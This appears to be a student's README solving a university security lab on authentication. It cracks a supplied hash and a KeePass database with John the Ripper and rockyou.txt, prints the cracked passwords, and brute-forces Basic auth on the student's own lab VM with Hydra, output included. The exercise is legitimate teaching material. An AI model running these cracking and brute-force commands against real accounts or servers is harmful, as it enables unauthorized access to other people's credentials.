ASBTutorials/Lab 9 - Authentication
2023-12-15 17:21:19 +01:00
..
.gitignore Add notes for Lab 09 2023-12-15 15:31:21 +01:00
README.md Solve Authentication task 2023-12-15 17:21:19 +01:00

Authentication

Download Wordlist

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt -O rockyou.txt

Password Cracking

Crack Password using john:

#!/bin/bash
john --wordlist=./rockyou.txt --format=crypt <(echo '$1$randsalt$1FzqFfQs5tCdStIZl215/.')

As a result we get the password: topgunner2k7

KeePass Cracking

Download KeePass database:

https://courses.fit.cvut.cz/BIE-ASB/tutorials/files/steve_passwords.kdbx

Crack KeePass database password:

#!/bin/bash
john --wordlist=./rockyou.txt <(keepass2john steve_passwords.kdbx)

As a result, we get the password: dancingdiva11195

Online Password Cracking

This task is solved using the heartbleed VM from Lab 5.

Preparation

Look up IP address of heartbleed VM:

ip address show

Add local DNS entry for heartbleed VM:

echo '{ip address} heartbleed.ssb' | sudo tee --append /etc/hosts

Change Apache configuration to require login:

 <VirtualHost *:443>
     ServerAdmin webmaster@localhost
 
     DocumentRoot /var/www/heartbleed.ssb
     ServerName heartbleed.ssb
     ServerAlias www.heartbleed.ssb
     SSLEngine on
     SSLCertificateFile /etc/apache2/ssl/apache.crt
     SSLCertificateKeyFile /etc/apache2/ssl/apache.key
     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+    <Directory "/var/www/heartbleed.ssb">
+        AuthType Basic
+        AuthName "Restricted Content"
+        AuthUserFile /etc/apache2/.htpasswd
+        Require valid-user
+    </Directory>
 </VirtualHost>

Create user login test with a password of your choice (the later the password occurs in rockyou.txt, the longer it takes to crack):

sudo htpasswd -c /etc/apache2/.htpasswd test

Reload settings:

service apache2 reload

Start Cracking

Crack password using Hydra:

hydra -l test -P ./rockyou.txt heartbleed.ssb https-get

Output:

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-15 17:15:46
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-gets://heartbleed.ssb:443/
[STATUS] 4625.00 tries/min, 4625 tries in 00:01h, 14339773 to do in 51:41h, 16 active
[443][http-get] host: heartbleed.ssb   login: test   password: vendetta
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-15 17:18:41